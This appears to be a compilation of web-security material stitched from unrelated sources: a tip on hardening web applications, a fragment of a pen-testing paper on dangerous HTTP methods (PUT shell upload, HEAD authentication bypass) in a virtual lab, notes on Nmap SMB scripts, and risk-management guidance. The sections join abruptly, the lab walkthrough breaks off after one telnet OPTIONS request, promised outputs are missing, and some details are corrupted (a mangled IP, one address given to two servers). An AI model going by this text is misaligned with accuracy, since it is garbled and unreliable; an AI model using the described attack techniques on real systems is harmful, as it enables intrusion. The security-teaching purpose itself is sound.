As Web applications become the regular locus of online business, so too are they becoming the frequent targets of attackers. Unfortunately, many Web applications are fraught with vulnerabilities, a fair number of which result from an insufficient focus on security during the development process.

While the scope of the fundamental security flaws in some applications often requires a re-architecture, there are several secondary measures infosec teams can implement to safeguard flawed applications. This tip covers a few of the steps that information security professionals can take to lock down their Web apps.

Using VPNs
For starters, as a best practice, certain functionality should only be accessible via a VPN. All admin functionality, for instance, should be remapped onto internal IPs, which can then only be accessed by certain IPs over a VPN. Example functions include content management systems (CMS), server status scripts (server-status), and info scripts or SQL admin programs. Recently, HBGary Federal was attacked partly because the company allowed its CMS to be exposed to public IPs accessible from the Internet. It is also prudent to restrict Web services access only to internal IPs, unless you intend to give other companies access to them, in which case, those companies should also be provided with credentials for service access.

Correcting coding errors


Programmers frequently rely too much on frameworks (like the .NET validate-request feature) to defend against dangerous inputs, or use application firewalls based on signatures that work by blacklisting the various attack vectors published by hackers in cross-site scripting (XSS) or SQL injection cheat sheets. This approach is flawed, as custom attacks can -- and often do -- bypass the protection afforded by .NET and simple blacklists. The best approach for addressing such security vulnerabilities in Web applications is to correctly validate the input when the software is written, or update the code after the app has been deployed with the help of a programmer or pen tester. Similarly, it is common for programmers to only filter hyphens on input passed to SQL queries, and, as such, numeric inputs are commonly found vulnerable to SQL injection, as hyphens are not needed in order to escape into SQL commands having numeric inputs. Another commonly neglected coding area is user authentication; existing usernames/email addresses are often enumerated on registration or through forgotten password mechanisms, which can allow valid logins to be brute-forced. The more popular the target website is, and the more users supported, the easier it becomes to enumerate accounts by brute force. .One fix for this, however, would be implementing captchas. Coding errors have also become more prevalent in file upload and download functionality in applications that, for instance, enable people to upload pictures. Common coding errors might allow shell code to be uploaded to attack the server, or malicious files uploaded for other users which, when viewed, can be used to attack other users machines. As such, it's necessary to have regular network pen tests to discover and eradicate any such vulnerabilities.

Authentication and access control


Perhaps the greatest area of concern is that passwords are often shared between websites, with a single set of credentials (email address and password) used to access eBay, PayPal and corporate email, for instance. Lets say a social network website with hundreds of thousands of users is hacked, and immediately after the shell code is run, all the usernames, emails and passwords are remotely accessed by the attacker. Its common for an attacker to immediately attempt to use stolen credentials to access victims accounts on other websites to obtain payment card data or financial account access, or to sell the credentials to other parties interested in perpetrating fraud. To defend against this, its common for banks and other organisations to implement additional authentication methods, using IP address checks, tokens, pinpads and other similar devices, as usernames and passwords alone are no longer considered secure.

Giving unnecessary rights to users is another area of concern, whether they be rights to a SQL server database or the service account that the application or Web server runs on. This allows SQL tables to be dropped, commands run on SQL servers or the Web server to run a wide range of programs, some of which might have privilege escalation vulnerabilities. While performing a recent pen test, I obtained a shell within an application server. Even though I was unable to escalate my privileges, the account had the ability to download and compile programs like port-scanners, which allowed me to demonstrate that the machine could be used to stage further attacks into the network. Thus, making sure that users -- and programs that run as users -- have the minimum amount of rights necessary to do their jobs, and no more, is of utmost importance.

Cleaning up error pages


It is still common for default error pages to be left in place; this might, for instance, allow the SQL database structure to be easily enumerated. More seriously is that such errors are likely to be captured by Google or other search engine crawls, which hacker groups can then use to discover servers potentially vulnerable for attack. When I hear of a high-profile website compromise, the first thing I do is inspect the Google cache for reported errors and, in approximately 80% of the cases, the Google cache contains a number of errors stored from the website. It's possible for an organisations developers to detect such pages by downing the SQL server to produce a SQL timeout error page within the development environment. And then, to prevent such pages from causing harm by exposing information, make the program redirect to the homepage instead of displaying such errors. Other regular causes for concern include the following: Default accounts with usernames such as 'admin,' 'administrator,' 'anonymous' or 'test'. Such accounts are rarely removed or renamed, which makes things easier for attackers, as only the password needs to be brute-forced. Broken access control mechanisms, which allow users to read or modify other users documents. These can be achieved by knowing the document ID, or, if the document name is predictable, guessing other document names. And, in the same manner, gaining access to admin programs by brute-forcing program names, within directories found to exist, like /admin/. Cross-site request forgery flaws, which can be used to take over users accounts within websites. Once an attacker takes over an account, he or she can then message other users from the account, or perform other actions, like forwarding messages to the compromised user's mailing list and/or changing their passwords.

PENETRATION TESTING OF A WEB APPLICATION USING HTTP METHODS


HTTP methods are functions that a web server provides to process a request. For example, the GET method is used to retrieve the web page from the server. According to RFC 2616, there are eight HTTP methods for HTTP 1.1, specifically OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, and CONNECT, and this set can be extended. In this section, the functions of the methods are described briefly with an explanation of why some of them are dangerous. The OPTIONS method is used to request available methods on a server, while the GET

method is used to retrieve the information that is requested. The GET method is one of the most common ways to retrieve web resources. The HEAD method is similar to the GET method, but is used to retrieve only header information. The POST method is used to send a request with the entity enclosed in a body; the response to this request is determined by the server. The PUT method is used to store the enclosed entity on a server, while the DELETE method is used to remove the resources from the server. The TRACE method is employed to return the request that was received by the final recipient from the client so that it can diagnose the communication. Finally, the CONNECT method creates a tunnel with a proxy .There are also extended HTTP methods such as web-based distribution authoring and versioning (WEBDAV). WEBDAV can be used by clients to publish web contents and involves a number of other HTTP methods such as PROPFIND, MOVE, COPY, LOCK, UNLOCK, and MKCOL (Goland, Whitehead, Faizi, Carter, & Jensen, 1999). HTTP methods can be used to help developers in the deployment and testing of web applications. On the other hand, when they are configured improperly, these methods can be used for malicious activity .

Dangerous Use of HTTP methods


Most of the HTTP methods mentioned above can be utilized to attack a web application. While GET and POST are used in most attacks, the methods themselves are not the problem and are required for a common web server. But PUT, DELETE, and CONNECT methods are not required for the most of web servers. It is dangerous to have these methods enabled on a web application because this can significantly impact its security. This section will explain why these methods are dangerous and provide an example of utilizing them to attack a web application. First, the PUT method can be used to introduce malicious codes and shells to the target. If the web server has the PUT method available in the JBOSS server, it is possible to upload JSP shells that can be used to execute malicious commands to the server (Sutherland, 2011). Moreover, this method can be employed to launch a phishing attack. The attacker can upload an HTML page with hyperlinks that redirect a victim to the malicious website or a malicious login form that can collect users confidential information. Second, the DELETE method can be used to remove important files in the application, causing the denial of service or removal of access configuration files, such as .htaccess in an Apache server, to gain unauthorized access (SANS Institute, 2009). Third, the CONNECT method can be employed to tunnel peer to peer (P2P) traffic over HTTP traffic. Since the network traffic is tunneled, the attacker can hide the contents of the traffic, as well as being able to bypass firewalls or security devices. As a result, detecting this unauthorized traffic is difficult because it is often hidden in ways that make it almost indistinguishable from normal authorized traffic (Alman, 2003). Additionally, the HEAD method is not considered dangerous but it can be used to attack a web application by mimicking the GET request. For example, the default security constraint of JAVA EE web.xml files restricts only the GET and POST methods, so the HEAD request can be sent to the target URL to initiate the execution to bypass the authentication. The penetration tester can actually use different verbs such as TRACE, PUT, DELETE, and any arbitrary strings such as HEED (Dabirsiaghi, 2008).

Penetration Testing Scenarios


We will discuss the use of dangerous HTTP methods during a penetration test. In order to show how and when to use each method, we will cover all steps of a penetration test: Reconnaissance, mapping, discovery and exploitation. Furthermore, there are three phases of testing in the demonstration. Each phase follows the three steps mentioned above. The first phase uses the HEAD method to attack a public web server. The second phase uses the PUT/DELETE method to attack an intranet server. Finally, the last phase uses the CONNECT method to attack

a firewall. Since the purpose of this paper is to demonstrate the usage of dangerous HTTP methods, some general steps such as using NMAP scanning are not described extensively.

The Testing Lab Environment


The lab resembles a company network that has two DMZ networks protected by a firewall. Figure 1 shows the network diagram of the company. This network was built with the VMWARE team feature, which creates a virtual LAN segment. All three LAN segments are connected by the virtual router/firewall, Vyatta 6.0. Since this is a virtual lab, a private IP address range has been used. A subnet 10.10.10.10/24 has been assigned to an external network and IP address 10.10.10.1 has been reserved for the firewalls external interface. For this demonstration, IP address 10.10.10.10 is reserved for the penetration testers laptop. Another subnet 192.168.10.0/24 has been assigned to the DMZ 1 network and IP address 192.168.10.1 has been reserved for the firewalls DMZ 1 interface; IP address 192.168.10.10 has been reserved for a public web server. A subnet 192.168.65.0/24 has been assigned to the DMZ 2 network, while IP address 192.168.65.1 has been reserved for the firewalls DMZ 2 interface. Two servers, an intranet web server and a proxy server, are connected to the DMZ 2 network. IP address 192.168.65.10 has been reserved for the intranet web server and IP address 192.168.65.10 has been reserved for the proxy server. The firewall restricts access to these networks. A host in the DMZ 1 network is only accessible via TCP port 80 from both the outside and the inside. A host in the DMZ 1 network can access hosts in any other network through only TCP port 80 and 8080. Hosts in the DMZ 2 network are not accessible from the outside network, but the DMZ 1 network is allowed to access the proxy server via TCP port 80 and 8080.

Network diagram

Compromising Public Web Server


This section demonstrates how the penetration tester gains an access to public web server by taking advantage of HTTP method which enables on public web server.

Reconnaissance
This penetration test is a black box test; the penetration tester does not have any knowledge about the target systems. At this point, the penetration tester only knows the company name and IP address ranges, which are subnet 10.10.10.0/24 and subnet 192.168.10.0/24. First, the penetration tester runs an NMAP scan against these two networks and finds the following information-10.10.1: Network device with no ports open; 192.168.10.10: Windows XP running Tomcat 5.0/JBOSS 4.0 with TCP port 80 open. Since port 80 is listening on host 192.168.10.10, the penetration tester does a further check and finds out that HTTP methods are enabled on the host. There are several ways to check the enabled methods; the easiest way is by using a telnet command, as shown in below Figure . The result shows that the host accepts many dangerous HTTP methods such as PUT and DELETE.

telnet 192.168.10.10 80 OPTIONS / HTTP/1.1 Host: 19*2.168.10.10 HTTP/ 1.1 200 OK X-Powered-By: Servlet 2.4: Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Allow: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS Content-Length:0 Date- Tue, 03 Jan 2012 20:07:11 GMT Server: Apache-Coyete/1.1

The Nmap scripting engine is a powerful tool for user-created scripts. This power is demonstrated in the suite of scripts designed to inspect Windows over the SMB protocol. Many footprinting tasks can be performed, including finding user accounts, open shares, and weak passwords. All these tasks are under a common framework, and share authentication libraries, which gives users a common and familiar interface. With modern script libraries, which were written by the author, the Nmap Scripting Engine (NSE) has the ability to establish a null or authenticated session with all modern versions of Windows. By leveraging these sessions, scripts have the ability to probe and explore Windows systems in great depth, providing an attacker with invaluable information about the server. Nmap, a network scanner, is among the best known security tools, and is considered to be one of the best free security tools in existence (Darknet, 2006). The typical use and functionality of Nmap is beyond the scope of this paper, but familiarity will make this paper far easier to be understood. The book Nmap Network Scanning, which is partially available for free, is one of the best information sources (Lyon, 2009). The Nmap Scripting Engine, or NSE, is an extension to Nmap developed with several purposes in mind, including advanced network discovery, sophisticated version detection, vulnerability detection, backdoor detection, and vulnerability exploitation (Lyon, 2009). After Nmap scans a group of hosts, NSE runs scripts against each host that matches specific criteria (for example, the host has the appropriate ports open). These scripts, which are written in the Lua programming language, can inspect the host in a much deeper and more sophisticated way than Nmap alone. Since Lua is a complete programming language, the possibilities for scripts are great. In addition to the power of scripts, another important aspect is the development culture. Since scripts can be written by anyone, and Lua is a relatively simple language

for programmers to learn, it is not difficult for a programmer to begin developing his or her own script. Due to the fairly small team of core developers, and an active mailing list, getting started in script development is easy.

Server Message Block


The Server Message Block (SMB) protocol, which is commonly called the Common Internet File System (CIFS), is a protocol used by Microsoft services (and implemented by Samba, among others) to communicate with each other. SMB can function directly on TCP port 445 or over NetBIOS on port 139 (Petri, 2009). Although it was originally designed as a protocol to manage files remotely (Leach, 1998), SMB can use named pipes and the Distributed Computing Environment/Remote Procedure Call (DCE/RPC) system to call remote functions (Kenneth, 1999). This opens up great possibilities for foot printing servers. The SMB protocol is fairly complicated, but, for the purposes of Nmap scripts, only a small subset is used. The implementations of it vary greatly, especially when it is used by printers and other embedded devices. Even the implementations in Samba and Windows are inconsistent with each other. As a result, the Nmap library for handling SMB connections has to be very tolerant of protocol differences, and attempts to communicate with all implementations. In any implementation of SMB, three packets are sent to establish a session: SMB_COM_NEGOTIATE, SMB_COM_SESSION_SETUP_AND X, and SMB_COM_TREE_CONNECT_AND X (see diagram) (Leach, 1998). In its response to all three messages, the server reveals information about itself. If the first three packets are successful, the client usually sends a fourth packet, SMB_COM_NT_CREATE_ANDX, which creates or opens a file or pipe.

SMB_COM_NEGOTIATE
The SMB_COM_NEGOTIATE packet is the first one sent by the client, and is the client's opportunity to indicate which protocols, flags, and options it understands. The

server responds with its preferred protocol, options, and flags, based on the clients list. The options and flags reveal certain configuration options to the client, such as whether or not message signatures are supported or required, whether or not the server requires plaintext passwords, and whether share-level or user-level authentication is understood. These options are probed by the script smb-security-mode.nse. The following is an example output against a typical configuration of Windows:

Some of these options are revealing from a penetration tester's perspective. For example, this server does not support message signing; as a result, man-in-the-middle attacks are possible. However, since message signing is not a default option on Windows, this is not a surprising state. If share-level security or plaintext passwords were required, however, that would be an interesting find. Implementing CIFS has more information about the different levels of security supported by SMB In addition to the security information, the response to SMB_COM_NEGOTIATE also reveals the server's time and timezone, as well as the name of the server and its workgroup or domain membership. Revealing the time may be useful to a penetration tester because it is a sign of how well maintained a server is. The name and workgroup of the server can be helpful to a penetration tester when trying to determine the purpose of a server or a network, leading to more targeted attacks for a penetration tester. The script smb-os-discovery.nse probes for the servers name and time. The following output is from smb-os-discovery run against a poorly maintained Windows 2000 test server

From the name and time alone, it can be determined that the operating system is Windows 2000 ("RON-WIN2K-TEST"), that it is a test machine, and that the time is off by about an hour (the current time is 11:03, but the server returns 11:59). One may conclude that it is a test server running on an outdated operating system, and that it is poorly maintained or infrequently used. This information could be valuable to a penetration tester when choosing a target, since the chances that this server has unpatched vulnerabilities are high. On a large network, this can quickly give a sense of a network's composition and purpose.

SMB_COM_SESSION_SETUP_ANDX
The SMB_COM_SESSION_SETUP_ANDX packet is sent by the client immediately after the negotiate response is received. The packets primary purpose is authentication, and contains the clients username, domain, and password. Unless plaintext authentication was requested in the negotiate packet, the password is hashed with one of Microsoft's hashing algorithms (both Lanman and NT Lanman (NTLM) are used by default). Recovering the password from one these hashes is supposed to be difficult (although in practice it is usually straight forward). Instead of sending a username and password, the client may also establish a null (or anonymous) session by sending a blank username and a blank password. For the purposes of these scripts, four account types are defined. Anonymous accounts, commonly called a null session, offer little access to the system, except on Windows 2000. Guest accounts offer slightly more access, and can find some interesting information; the guest account typically has no password and is disabled by default on many Windows versions. Under certain configurations, such as Windows XPs default settings, all user accounts, including administrators, are treated as guests (Microsoft, 2005). User-level accounts are common, and are able to perform most checks. User-level accounts are defined as any account on a system that is not in the Administrators group. And finally, administrator-level accounts are accounts in the Administrators group. Administrative accounts can run every test against Windows 2003 and earlier, but are essentially the same as user-level accounts on Windows Vista and higher unless user account control (UAC) is disabled. The server's response to the SMB_COM_SESSION_SETUP_ANDX packet contains a true/false value indicating whether or not the username/password combination was accepted. If it was accepted, which is always the case when an anonymous (null) session is requested, the server also includes its operating system and LAN manager version in the reply. The smb-os-discovery.nse script will authenticate anonymously and display the operating system information. The following examples show the smb-os-discovery.nse script being run against Windows 2000 and Windows 2003:

Penetration Testing vs Vulnerability Assessment


1. A vulnerability assessment usually includes a mapping of the network and systems connected to it, an identification of the services and versions of services running and the creation of a catalogue of the vulnerable systems. 2. A vulnerability assessment normally forms the first part of a penetration test. The additional step in a penetration test is the exploitation of any detected vulnerabilities, to confirm their existence, and to determine the damage that might result due to the vulnerability being exploited and the resulting impact on the organization. 3. In comparison to a penetration test a vulnerability assessment is not so intrusive and does not always require the same technical capabilities. Unfortunately it may be impossible to conduct such a thorough assessment that would guarantee that the most damaging vulnerabilities (i.e., high risk) have been identified. 4. The difference between a penetration test and a vulnerability assessment is becoming a significant issue in the penetration testing profession. There are many penetration testers that are only capable of performing vulnerability assessments and yet present themselves as penetration testers. If a company is unfamiliar with the process they may think a networked system has been fully assessed, when this is not the case. 5. Vulnerability Analysis is the process of identifying vulnerabilities on a network, whereas a Penetration Testing is focused on actually gaining unauthorized access to the tested systems and using that access to the network or data, as directed by the client. 6. A Vulnerability Analysis provides an overview of the flaws that exist on the system while a Penetration Testing goes on to provide an impact analysis of the flaws identifies the possible impact of the flaw on the underlying network, operating system, database etc. 7. Vulnerability assessment use scanners to identify vulnerabilities that throws lot of false positives .In Penetration testing as there is human intervention to exploit vulnerabilities false positives does not exist. 8. Vulnerability Analysis is more of a passive process. In Vulnerability Analysis you use software tools that analyze both network traffic and systems to identify any exposures that increase vulnerability to attacks. Penetration Testing is an active practice wherein ethical hackers are employed to simulate an attack and test the network and systems resistance. 9. Vulnerability Analysis deals with potential risks, whereas Penetration Testing is actual proof of concept. Vulnerability Analysis is just a process of identifying and quantifying the security Vulnerabilities in a system. Vulnerability Analysis doesnt provide validation of Security Vulnerabilities. Validation can be only done by Penetration testing. 10. The scope of a Penetration Testing can vary from a Vulnerability Analysis to fully exploiting the targets to destructive testing. Penetration Testing consists of a Vulnerability Analysis, but it goes one step ahead where in you will be evaluating the security of the system by simulating an attack usually done by a Malicious Hacker.

For instance a Vulnerability Analysis exercise might identify absence of anti-virus software on the system or open ports as a vulnerability. The Penetration Testing will determine the level to which existing vulnerabilities can be exploited and the damage that can be inflicted due to this. 11. A Vulnerability Analysis answers the question: What are the present Vulnerabilities and how do we fix them? A Penetration Testing simply answers the questions: Can any External Attacker or Internal Intruder break-in and what can they attain? 12. A Vulnerability Analysis works to improve security posture and develop a more mature, integrated security program, where as a Penetration Testing is only a snapshot of your security programs effectiveness. Commonly Vulnerability Assessment goes through the following phases: Information Gathering, Port Scanning, Enumeration, Threat Profiling & Risk Identification, Network Level Vulnerability Scanning, Application Level Vulnerability Scanning, Mitigation Strategies Creation, Report Generation, and Support. Where as a Penetration Testing Service however have following phases: Information Gathering, Port Scanning, Enumeration, Social Engineering, Threat Profiling & Risk Identification, Network Level Vulnerability Assessment, Application Level Vulnerability Assessment, Exploit Research & Development, Exploitation, Privilege Escalation, Engagement Analysis, Mitigation Strategies, Report Generation, and Support.

RISK ANALYSIS
Risk is the net negative impact of the exercise of a vulnerability, considering both the probability and the impact of occurrence. Risk management is the process of identifying risk, assessing risk, and taking steps to reduce risk to an acceptable level. This guide provides a foundation for the development of an effective risk management program, containing both the definitions and the practical guidance necessary for assessing and mitigating risks identified within IT systems. The ultimate goal is to help organizations to better manage IT-related mission risks. In addition, this section provides information on the selection of cost-effective security controls.2 These controls can be used to mitigate risk for the better protection of mission-critical information and the IT systems that process, store, and carry this information. Organizations may choose to expand or abbreviate the comprehensive processes and steps suggested in this guide and tailor them to their environment in managing IT-related mission risks.

OBJECTIVE OF RISK MANAGEMENT


The objective of performing risk management is to enable the organization to accomplish its mission(s) (1) by better securing the IT systems that store, process, or transmit organizational information; (2) by enabling management to make well-informed risk management decisions to justify the expenditures that are part of an IT budget; and (3) by assisting management in authorizing (or accrediting) the IT systems3 on the basis of the supporting documentation resulting from the performance of risk management. This section provides a common foundation for experienced and inexperienced, technical, and non-technical personnel who support or use the risk management process for their IT systems. Senior management, the mission owners, who make decisions about the IT security

budget. Federal Chief Information Officers, who ensure the implementation of risk management for agency IT systems and the security provided for these IT systems The Designated Approving Authority (DAA), who is responsible for the final decision on whether to allow operation of an IT system The IT security program manager, who implements the security program Information system security officers (ISSO), who are responsible for IT security IT system owners of system software and/or hardware used to support IT functions. Information owners of data stored, processed, and transmitted by the IT systems Business or functional managers, who are responsible for the IT procurement process Technical support personnel (e.g., network, system, application, and database administrators; computer specialists; data security analysts), who manage and administer security for the IT systems IT system and application programmers, who develop and maintain code that could affect system and data integrity IT quality assurance personnel, who test and ensure the integrity of the IT systems and data Information system auditors, who audit IT systems IT consultants, who support clients in risk management.

RISK MANAGEMENT OVERVIEW


This section describes the risk management methodology, how it fits into each phase of the SDLC, and how the risk management process is tied to the process of system authorization (or accreditation).

Risk Management (Risk = Threat x Vulnerability)


You need to understand the risks involved in doing a pen test. It could cause potential disturbances, such as unexpected server crashes, data corruption, or even performance brought to a standstill, resulting in loss of revenue and output productivity. When unannounced tests are scheduled, they normally are associated with risk at a high rate and the expectations of encountering problems that are unexpected are even higher. A successful pen test depends on the expertise and experience of the pen testing team. Pen test teams need to plan for risks and ensure that contingency plans fall in place to optimize time and resource utilization. You need to determine the risk factor of each asset and its value to get the damage/loss value that could occur in cases of security breaches and disturbances.

IMPORTANCE OF RISK MANAGEMENT


Risk management encompasses three processes: risk assessment, risk mitigation, and evaluation and assessment. The risk assessment process, which includes identification and evaluation of risks and risk impacts, and recommendation of risk-reducing measures. Section 4 describes risk mitigation, which refers to prioritizing, implementing, and maintaining the appropriate risk-reducing measures recommended from the risk assessment process. Section 5 discusses the continual evaluation process and keys for implementing a successful risk management program. The DAA or system authorizing official is responsible for determining whether the remaining risk is at an acceptable level or whether additional security controls should be implemented to further reduce or eliminate the residual risk before authorizing (or accrediting) the IT system for operation. Risk management is the process that allows IT managers to balance the operational and economic costs of protective measures and achieve gains in mission capability by protecting the IT systems and data that support their organizations missions. This process is not unique to the IT environment; indeed it pervades decision-making in all areas of our daily lives. Take the case of home security, for example. Many people decide to have home security systems installed and pay a monthly fee

to a service provider to have these systems monitored for the better protection of their property. Presumably, the homeowners have weighed the cost of system installation and monitoring against the value of their household goods and their familys safety, a fundamental mission need. The head of an organizational unit must ensure that the organization has the capabilities needed to accomplish its mission. These mission owners must determine the security capabilities that their IT systems must have to provide the desired level of mission support in the face of realworld threats. Most organizations have tight budgets for IT security; therefore, IT security spending must be reviewed as thoroughly as other management decisions. A well-structured risk management methodology, when used effectively, can help management identify appropriate controls for providing the mission-essential security capabilities.

INTEGRATION OF RISK MANAGEMENT INTO SDLC


Minimizing negative impact on an organization and need for sound basis in decision making are the fundamental reasons organizations implement a risk management process for their IT systems. Effective risk management must be totally integrated into the SDLC. An IT systems SDLC has five phases: initiation, development or acquisition, implementation, operation or maintenance, and disposal. In some cases, an IT system may occupy several of these phases at the same time. However, the risk management methodology is the same regardless of the SDLC phase for which the assessment is being conducted. Risk management is an iterative process that can be performed during each major phase of the SDLC. Table describes the characteristics of each SDLC phase and indicates how risk management can be performed in support of each phase.

Integration of Risk Management into the SDLC


SDLC Phases Phase Characteristics Support from Risk Management Activities
Identified risks are used to support the development of the system requirements, including security requirements, and a security concept of operations (strategy) The risks identified during this phase can be used to support the security analyses of the IT system that may lead to architecture and design tradeoffs during system development The risk management process supports the assessment of the system implementation against its requirements and within its modeled operational environment. Decisions regarding risks identified must be made prior to system operation
Risk management activities are performed for periodic system reauthorization (or reaccreditation) or whenever major changes are made to an IT system in its operational, production environment (e.g., new system interfaces)

Phase 1Initiation

The need for an IT system is expressed and the purpose and scope of the IT system is documented

Phase 2Development or Acquisition

The IT system is designed, purchased, programmed, developed, or otherwise constructed

Phase 3Implementation

The system security features should be configured, enabled, tested, and verified

Phase 4Operation or Maintenance

The system performs its functions. Typically the system is being modified on an ongoing basis through the addition of hardware and software and by changes to organizational processes, policies, and procedures This phase may involve the disposition of information, hardware, and software. Activities may include moving, archiving, discarding, or destroying information and sanitizing the hardware and

Phase 5Disposal

Risk management activities are performed for system components that will be disposed of or replaced to ensure that the hardware and software are properly disposed of, that residual data is

software

appropriately handled, and that system migration is conducted in a secure and systematic manner

RISK ASSESSMENT
Risk assessment is the first process in the risk management methodology. Organizations use risk assessment to determine the extent of the potential threat and the risk associated with an IT system throughout its SDLC. The output of this process helps to identify appropriate controls for reducing or eliminating risk during the risk mitigation process, as discussed in Section 4. Risk is a function of the likelihood of a given threat-sources exercising a particular potential vulnerability, and the resulting impact of that adverse event on the organization. To determine the likelihood of a future adverse event, threats to an IT system must be analyzed in conjunction with the potential vulnerabilities and the controls in place for the IT system. Impact refers to the magnitude of harm that could be caused by a threats exercise of a vulnerability. The level of impact is governed by the potential mission impacts and in turn produces a relative value for the IT assets and resources affected (e.g., the criticality and sensitivity of the IT system components and data). The risk assessment methodology encompasses nine primary steps 1. 2. 3. 4. 5. 6. 7. 8. 9. System Characterization Threat Identification Vulnerability Identification Control Analysis Likelihood Determination Impact Analysis Risk Determination Control Recommendations Results Documentation

IMPACT ANALYSIS
The next major step in measuring level of risk is to determine the adverse impact resulting from a successful threat exercise of a vulnerability. Before beginning the impact analysis, it is necessary to obtain the following necessary System mission (e.g., the processes performed by the IT system) System and data criticality (e.g., the systems value or importance to an organization) System and data sensitivity. This information can be obtained from existing organizational documentation, such as the mission impact analysis report or asset criticality assessment report. A mission impact analysis (also known as business impact analysis [BIA] for some organizations) prioritizes the impact levels associated with the compromise of an organizations information assets based on a qualitative or quantitative assessment of the sensitivity and criticality of those assets. An asset criticality assessment identifies and prioritizes the sensitive and critical organization information assets (e.g., hardware, software, systems, services, and related technology assets) that support the organizations critical missions. If this documentation does not exist or such assessments for the organizations IT assets have not been performed, the system and data sensitivity can be determined based on the level of protection required to maintain the system and datas availability, integrity, and confidentiality.

Regardless of the method used to determine how sensitive an IT system and its data are, the system and information owners are the ones responsible for determining the impact level for their own system and information. Consequently, in analyzing impact, the appropriate approach is to interview the system and information owner(s). Therefore, the adverse impact of a security event can be described in terms of loss or degradation of any, or a combination of any, of the following three security goals: integrity, availability, and confidentiality. The following list provides a brief description of each security goal and the consequence (or impact) of its not being met: Loss of Integrity. System and data integrity refers to the requirement that information be protected from improper modification. Integrity is lost if unauthorized changes are made to the data or IT system by either intentional or accidental acts. If the loss of system or data integrity is not corrected, continued use of the contaminated system or corrupted data could result in inaccuracy, fraud, or erroneous decisions. Also, violation of integrity may be the first step in a successful attack against system availability or confidentiality. For all these reasons, loss of integrity reduces the assurance of an IT system. Loss of Availability. If a mission-critical IT system is unavailable to its end users, the organizations mission may be affected. Loss of system functionality and operational effectiveness, for example, may result in loss of productive time, thus impeding the end users performance of their functions in supporting the organizations mission. Loss of Confidentiality. System and data confidentiality refers to the protection of information from unauthorized disclosure. The impact of unauthorized disclosure of confidential information can range from the jeopardizing of national security to the disclosure of Privacy Act data. Unauthorized, unanticipated, or unintentional disclosure could result in loss of public confidence, embarrassment, or legal action against the organization. Some tangible impacts can be measured quantitatively in lost revenue, the cost of repairing the system, or the level of effort required to correct problems caused by a successful threat action. Other impacts (e.g., loss of public confidence, loss of credibility, damage to an organizations interest) cannot be measured in specific units but can be qualified or described in terms of high, medium, and low impacts. Because of the generic nature of this discussion, this guide designates and describes only the qualitative categorieshigh, medium, and low impact

RISK DETERMINATION
The purpose of this step is to assess the level of risk to the IT system. The determination of risk for a particular threat/vulnerability pair can be expressed as a function of The likelihood of a given threat-sources attempting to exercise a given vulnerability The magnitude of the impact should a threat-source successfully exercise the vulnerability The adequacy of planned or existing security controls for reducing or eliminating risk. To measure risk, a risk scale and a risk-level matrix must be developed.

Likelihood Determination
To derive an overall likelihood rating that indicates the probability that a potential vulnerability may be exercised within the construct of the associated threat environment, the following governing factors must be considered: Threat-source motivation and capability Nature of the vulnerability Existence and effectiveness of current controls. The likelihood that a potential vulnerability could be exercised by a given threat-source can be described as high, medium, or low.

Likelihood Definitions

Risk-Level Matrix
The final determination of mission risk is derived by multiplying the ratings assigned for threat likelihood (e.g., probability) and threat impact. Table below shows how the overall risk

ratings might be determined based on inputs from the threat likelihood and threat impact categories. The matrix below is a 3 x 3 matrix of threat likelihood (High, Medium, and Low) and threat impact (High, Medium, and Low). Depending on the sites requirements and the granularity of risk assessment desired, some sites may use a 4 x 4 or a 5 x 5 matrix. The latter can include a Very Low /Very High threat likelihood and a Very Low/Very High threat impact to generate a Very Low/Very High risk level. A Very High risk level may require possible system shutdown or stopping of all IT system integration and testing efforts. The sample matrix in Table shows how the overall risk levels of High, Medium, and Low are derived. The determination of these risk levels or ratings may be subjective. The rationale for this justification can be explained in terms of the probability assigned for each threat likelihood level and a value assigned for each impact level. For example, The probability assigned for each threat likelihood level is 1.0 for High, 0.5 for Medium, 0.1 for Low The value assigned for each impact level is 100 for High, 50 for Medium, and 10 for Low.

Risk-Level Matrix

KEY ROLES
Risk management is a management responsibility. This section describes the key roles of the personnel who should support and participate in the risk management process.

Senior Management. Senior management, under the standard of due care and ultimate responsibility
for mission accomplishment, must ensure that the necessary resources are effectively applied to develop the capabilities needed to accomplish the mission. They must also assess and incorporate results of the risk assessment activity into the decision making process. An effective risk management program that assesses and mitigates IT-related mission risks requires the support and involvement of senior management.

Chief Information Officer (CIO). The CIO is responsible for the agencys IT planning, budgeting,
and performance including its information security components. Decisions made in these areas should be based on an effective risk management program.

System and Information Owners. The system and information owners are responsible for ensuring
that proper controls are in place to address integrity, confidentiality, and availability of the IT systems and data they own. Typically the system and information owners are responsible for changes to their IT systems. Thus, they usually have to approve and sign off on changes to their IT systems (e.g., system enhancement, major changes to the software and hardware). The system and information owners must therefore understand their role in the risk management process and fully support this process.

Business and Functional Managers. The managers responsible for business operations and IT
procurement process must take an active role in the risk management process. These managers are the individuals with the authority and responsibility for making the trade-off decisions essential to mission accomplishment. Their involvement in the risk management process enables the achievement of proper security for the IT systems, which, if managed properly, will provide mission effectiveness with a minimal expenditure of resources.

ISSO. IT security program managers and computer security officers are responsible for their
organizations security programs, including risk management. Therefore, they play a leading role in introducing an appropriate, structured methodology to help identify, evaluate, and minimize risks to the IT systems that support their organizations missions. ISSOs also act as major consultants in support of senior management to ensure that this activity takes place on an ongoing basis.

IT Security Practitioners. IT security practitioners (e.g., network, system,application, and database


administrators; computer specialists; security analysts; security consultants) are responsible for proper implementation of security requirements in their IT systems. As changes occur in the existing IT system environment (e.g., expansion in network connectivity, changes to the existing infrastructure and organizational policies, introduction of new technologies), the IT security practitioners must support or use the risk management process to identify and assess new potential risks and implement new security controls as needed to safeguard their IT systems.

.Security Awareness Trainers (Security/Subject Matter Professionals).

The organizations personnel are the users of the IT systems. Use of the IT systems and data according to an organizations policies, guidelines, and rules of behavior is critical to mitigating risk and protecting the organizations IT resources. To minimize risk to the IT systems, it is essential that system and application users be provided with security awareness training. Therefore, the IT security trainers or security/subject matter professionals must understand the risk management process so that they can develop appropriate training materials and incorporate risk assessment into training programs to educate the end users.

